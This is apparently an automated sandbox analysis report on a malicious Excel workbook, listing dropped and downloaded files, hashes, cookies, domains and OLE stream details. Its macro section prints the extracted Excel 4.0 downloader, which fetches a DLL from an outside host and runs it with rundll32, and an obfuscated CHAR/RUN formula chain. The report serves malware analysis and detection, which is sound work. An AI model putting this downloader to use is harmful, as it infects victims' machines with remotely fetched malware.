Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	true
Reputation:	low
IE Cache URL:	https://rnollg.com/kev/scfrd.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\B0EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	59780
Entropy (8bit):	7.7698706955807175
Encrypted:	false
SSDEEP:	768:SwGBP++aB0WviH/WoTXZSzrSimIbCVpoWpgffXfQG:SwmW+aB3viH/WaI5xGVpoWpgF
MD5:	5C7906A499CB652389B9D6862F96301E
SHA1:	1F8A2FB35CCDDDD0DBF6A658446BDFF56C4C3CC8
SHA-256:	DF88EFD4327B49EF6B6427E1CA6ABC6BDEDE6276E0EE36068A4AB73EA09E9C73
SHA-512:	A38C555DAE246C5832FB54DAF384B03D271B833342B5CAAC4B988B88378CD77E5085326B4BF9C7C72B766BCABD099E8C7B1218AB21F8999854A2DB05B0D21ECE
Malicious:	false
Reputation:	low
Preview:	..n.0...'..".N...v.z.u.[.v.`.Cb...........U{n.....I.I...U.d..2zJX1"...H..).s.3?'..BK...S..O.g.?Ln..\|.....:...R_..._..:.,.kE.?]E.(....G.3Z..@.<..d6...q..j.oo..&...sIjJ...E.F.{".Y,T..wml]x.@H_...).SQ..@.qc...VW{..M........W.cs;."Vv[..S.....r\|.....:%!.....m..]5.....eq.I.f.sX.....V..\i1o ......Q..J=.Nl..Su.L..P.......@....}..c$>>#.....3$>.".q......l...s...$cX..0.a..BU.....W...2,d.X....c!+.BV.....Y9..r,d.X...u....."k.a....r.].....u....*l..)....1F.^....{\|H'.....x...N..L....cl.`.....T....\P....%j;..&...KB!.....m...........PK..........!..0O.&...........[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 27 04:24:43 2021, atime=Wed Jan 27 04:24:43 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.470300585911857
Encrypted:	false
SSDEEP:	12:85QfLgXg/XAlCPCHaXgzB8IB/2OUo4X+WnicvbrubDtZ3YilMMEpxRljKnXcTdJU:85Q/XTwz6IIm4YeviDv3qVrNru/
MD5:	0684FDE19BFC00ACDD5FACB9DF24C911
SHA1:	9F9624971A7A5BFF82F8896F288CF77192D6BEE8
SHA-256:	08F9DC31D9251117A507995BE3959865FD1FC1F3A8EC9412249A0021F097D112
SHA-512:	DA0D34127A061940AF6DD39EBD56D98CF526AFEC242141EF4F2956CAA50D8FDBF435A6EFC10406C39D0123D1E9B5FC75011D60C58C0D4F5365DEFFB1C88AFD45
Malicious:	false
Reputation:	low
Preview:	L..................F...........7G.....l......l....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....;R.+..Desktop.d......QK.X;R.+..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\case (166).LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jan 27 04:24:43 2021, atime=Wed Jan 27 04:24:43 2021, length=99328, window=hide
Category:	dropped
Size (bytes):	4056
Entropy (8bit):	4.51571445846396
Encrypted:	false
SSDEEP:	96:8w/XLIksLNOq1VQh2w/XLIksLNOq1VQh2S/XLIksLNOq1VQh2S/XLIksLNOq1VQ/:8yIklIQEyIklIQEAIklIQEAIklIQ/
MD5:	30E7EFDD04DC5E1D14F25F7DF13762FD
SHA1:	9E7D46625ED41735CD67A5E520D44403A7770AF4
SHA-256:	DD3C0511698ECB1CFF36A079CF5D0C504EBFFF90704FECBB89D836AEBE1099CC
SHA-512:	3FD3308AEFD5EC793E4E82A44EF46BA47F8421BF2C21C5A43070EADEF8FA79B2217368224B4ED821384742041A0A1AA3A2D3267AEAB96E2090E3ADE7BDEA80ED
Malicious:	false
Reputation:	low
Preview:	L..................F.... .....J..{.....l...Od.l................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.d..;R.+ .CASE(1~1.XLS..J.......Q.y.Q.y*...8.....................c.a.s.e. .(.1.6.6.)...x.l.s.......x...............-...8...[............?J......C:\Users\..#...................\\066656\Users.user\Desktop\case (166).xls.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.c.a.s.e. .(.1.6.6.)...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......066656..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	169
Entropy (8bit):	4.440698811068057
Encrypted:	false
SSDEEP:	3:oyBVomMpFuYCeIdFuYCmMpFuYCeIdFuYCmMpFuYCeIdFuYCmMpFuYCv:dj6pFuY4FuYUpFuY4FuYUpFuY4FuYUp2
MD5:	6EA362392A055C1873C0A3199650A172
SHA1:	14D11AA54483C1DDB4767161573F791725CB612D
SHA-256:	F58D57FE73BD127227A745DE13B7B7A7259DB69A88771DEB1EA8D183722FD3D0
SHA-512:	08D4BAC636CA2AD4E0F67B837239C5B487105522F138CC776944032C02AA9FFC237BDC11C2C1C40D04CD933C81F5FBAC9D273FF2D796C7AF7ED8B674F81A0FC9
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[xls]..case (166).LNK=0..case (166).LNK=0..[xls]..case (166).LNK=0..case (166).LNK=0..[xls]..case (166).LNK=0..case (166).LNK=0..[xls]..case (166).LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\9GI0R7W2.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	117
Entropy (8bit):	4.463713814275856
Encrypted:	false
SSDEEP:	3:GmM/P3/GGcxPKUzWvCo7w2lSN51V2fOWUTUIUnvPv:XM/nQyP9weEcAUvPv
MD5:	2E300022FC078B63EDDA721753C0D406
SHA1:	1659E4BF30AFDCAB025C7E6FE4BF96709635ACA6
SHA-256:	161D203C1A6BF48E2917E07EFB5AFDB4F53C2F23D63094A63BE0705C117DCD12
SHA-512:	49888E38F979B28FD8F576DB80276CA5EA1A5E211305AA0DE61395A1887667269B100E554158F89D6EE66279EB036AF37C200841CAA61711E12E4F97EF80A256
Malicious:	false
Reputation:	low
IE Cache URL:	gadgetswolf.com/
Preview:	__cfduid.d4004b2fa656ad149d3c281fe13cb30131611692753.gadgetswolf.com/.9728.1777262208.30870452.2128116109.30864493.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VVPZM9EY.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	119
Entropy (8bit):	4.481534391542238
Encrypted:	false
SSDEEP:	3:GmM/oXdUHKEG4RVyKRv8KJpKfcSN0LFd1V2fP7UE3RnvPv:XM/oXdKhyKkv0/5cPQqvPv
MD5:	218DC818EE1AF101ADBDED520019C4D1
SHA1:	B1E1B3550E8CBD769B5531CF8E7DD23C387CFF1D
SHA-256:	E64249F9608B271FC9F493C5CB5203CF02ACA125680800DD8EB0CAB41EA63928
SHA-512:	A80232FEC18C665FDE0188A08B35FD0FB0A931F321B7662D1DE97F59053BC96A5B64E67DDBF9AEEC751130C317AE9F0E0615A2E8412A3519531D378FF177AF15
Malicious:	false
Reputation:	low
IE Cache URL:	homesoapmolds.com/
Preview:	__cfduid.dd2580b35fd1b568ac9dbf1f6c1f484301611692754.homesoapmolds.com/.9728.1787262208.30870452.2134512120.30864493.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X2GDAG4X.txt Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	115
Entropy (8bit):	4.4644860756744995
Encrypted:	false
SSDEEP:	3:GmM/QDCcvNvjGOYPwPUTKRvdAjMdl1cSCLFd1V2fI6UWW6dTRRnvPv:XM/QDCa2b2wqlVS5c5u6dTvPv
MD5:	FAAC6CF3287C0D9FC6769DC6994929B0
SHA1:	FE8F40563CFF355D4F9D56692F51F4F901925E79
SHA-256:	86A99A90662AAE69461EB44BC6BD8C610BA5FDA12B0DECDFCDBEE83A776FD63B
SHA-512:	B6A9537688B80FE95A760F91EBDA8BA12CFA499FB768D82B19AD2173431CE372C63CE1166441875E65BFB7D8D1ADA013E7ABF54EBA4B51E7BBB79BE4CAC36EF9
Malicious:	false
Reputation:	low
IE Cache URL:	govemedico.tk/
Preview:	__cfduid.d80efb969aed11158f209acabd61d60dc1611692754.govemedico.tk/.9728.1787262208.30870452.2141532133.30864493.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	112
Entropy (8bit):	4.4460348970835355
Encrypted:	false
SSDEEP:	3:GmM/JgGdDBrRGVWYHUcIGT0cSNE+1V2e2OTmvXn:XM/9ddNGVWYHUnSGvTm/
MD5:	465D769BE13DF75DFCC7B6A5D6584F39
SHA1:	1A1DC7A24FCB846A5CCB3B06CC2C1297D471417F
SHA-256:	4072FAAE99D34FF58B18F16AEC8FF206BC444D81522CB68120D9D449B189F065
SHA-512:	64C1AB93675A7EDF4880EA8758EA4DB60912B792662FD002C1F1E4882617FC4B703E7904FE5DC89A7857C533B0BE3AF864D595075EB6D12955D6F6B90F2296C7
Malicious:	false
Reputation:	low
IE Cache URL:	rnollg.com/
Preview:	__cfduid.d441e3bff26bbc8fd1b56a1b9c560dff61611692720.rnollg.com/.9728.1447262208.30870452.3092370815.30864492.*.

C:\Users\user\AppData\Roaming\Ywmiu\egwih.dll Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
Entropy (8bit):	6.687983171155114
Encrypted:	false
SSDEEP:	24576:xTw7wGauFB4FU61kqTWJtknpwHfl1kKoop7:ih/FaU65TE1Hf9oI7
MD5:	B0F3FA047F6AE39A145FD364F693638E
SHA1:	1951696D8ACA4A31614BB68F9DA392402785E14E
SHA-256:	0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
SHA-512:	86E4516705380617A9F48B2E1CD7D9E676439398B802EB6047CD478D4B10BF8F4BA20E019F337B01761FA247CD631CCAB22851F078089C2E1C61574BCA9F5B98
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Vt1..._..._..._......._...!..._.5."..._.5.2..._......._...^..._.5.1.C._.5.%..._.5.#..._.5.'..._.Rich.._.........................PE..L......C...........!................wq............@.....................................................................c.......<....`..`....................p..T...................................p...@...............`............................text............................... ..`.rdata..C...........................@..@.data...`d....... ..................@....rsrc...`....`......................@..@.reloc..~....p... ... ..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\A1EE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	173366
Entropy (8bit):	5.331125685153871
Encrypted:	false
SSDEEP:	3072:9xrtdAOtyoVlDGUUlEfblBiPP58Lml9i+aEdDhluaEdzY36DxrtdAOtyoVlDGUUv:9xrtdAOtyoVlDGUUlEfblBeP52ml9i+r
MD5:	6FC2F1786F3A86691A5A8122FC5A52AF
SHA1:	4E3DF6537A130B0BD9F2FF757FC7FAEE4FCFD60F
SHA-256:	DC5196B6C4603AB51F4FC89F0E21377B5AC0276BF10841EF08ED48C51667786C
SHA-512:	0D7B0211BF8FD6B7AACA3515CCDF9F6FEAD683681D8054E2C71E6F29AC0B1D397B819527548181EE1ADBE95A35DF1D5C7B603BD982DEA1EF1CE0887398271B1D
Malicious:	false
Reputation:	low
Preview:	........g2..........................\.p....user B.....a.........=.@............................................................... .....................................=........K.$8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.o.r.b.e.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.(.@...............C.o.r.b.e.l. .L.i.g.h.t.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1...@...,...........C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1.(.0...............C.o.r.b.e.l. .L.i.g.h.t.1.(.0...>...........C.o.r.b.e.l. .L.i.g.h.t.1.(.....>...........C.o.r.b.e.l. .L.i.g.h.t.1...................C.a.l.i.b.r.i.1.(.................C.o.r.b.e.l. .L.i.g.h.t.1...0...............C.a.

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: , Last Saved By: , Name of Creating Application: Microsoft Excel, Last Printed: Tue Jan 26 16:17:13 2021, Create Time/Date: Thu Apr 23 13:26:24 2020, Last Saved Time/Date: Tue Jan 26 16:28:15 2021, Security: 0
Entropy (8bit):	3.8739836669860748
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	case (166).xls
File size:	156714
MD5:	44b43922e08e0e8e1ec65300b3b1aa74
SHA1:	ec1a847009295036381af1b0a4383a61c3dcbb75
SHA256:	9b8516fcbe183de0a53ac47ea7f4289176e23fc82da1fe67c70cedc823f5dba6
SHA512:	f54baff4c52037180433a6b246bbf773924327e8ebc641e7a896a2a7ee79ae4e9326984cbd646be73f9d5fa97f2b8e8e5e7628f277df70deb2cb9e7771f69356
SSDEEP:	3072:49SUz4tH8vsderSh1yRNJd6zAtH8U5BXKjBPWlyTSgG+g1j:49SUz4tH8vsderSh1yRNJdaAtH8U5B6G
File Content Preview:	........................>.......................0...........................-......./..........................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "case (166).xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Code Page:	1251
Author:
Last Saved By:
Last Printed:	2021-01-26 16:17:13
Create Time:	2020-04-23 12:26:24
Last Saved Time:	2021-01-26 16:28:15
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.843601759481
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . ( . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j S R F q S o B P w O . . . . . M a c r o 2 . . . . . M a c r o 3 . . . . . M a c r o 4 . . . . . M a c r o 5 . . . . . M a c r o 6 . . . . . M a c r o 7 . . . . . M a c r o 8 . . . . . M a c r o 9 . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 28 02 00 00 06 00 00 00 01 00 00 00 38 00 00 00 0f 00 00 00 40 00 00 00 0b 00 00 00 4c 00 00 00 10 00 00 00 54 00 00 00 0d 00 00 00 5c 00 00 00 0c 00 00 00 e7 01 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 00 00 00 00 0b 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.362148031008
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . . g j . . . @ . . . . 9 . ? . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 68 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 02 00 00 00 e3 04 00 00

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General
Stream Path:	Book
File Type:	Applesoft BASIC program data, first line number 8
Stream Size:	145752
Entropy:	3.94377585798
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . L G u P G w K V E D q c E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . = . . . . . . . . Z . $ 8 .
Data Raw:	09 08 08 00 00 05 05 00 04 3d cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0e c0 ed e4 f0 e5 e9 20 c5 eb e8 f1 e5 e5 e2 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

CALL(URLMON, URLDownloadToFileA, "JJCCJJ", 0, "https://rnollg.com/kev/scfrd.dll", C:\ProgramData\BysKIez.dll, 0, 0)
CALL(Shell32, ShellExecuteA, "JJCCCCJ", 0, Open, "rundll32.exe", C:\ProgramData\BysKIez.dll, DllRegisterServer", 0, 0)

,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CHAR($FJ$1168-11),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($HL$1475),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN($GW$1647),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,84,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,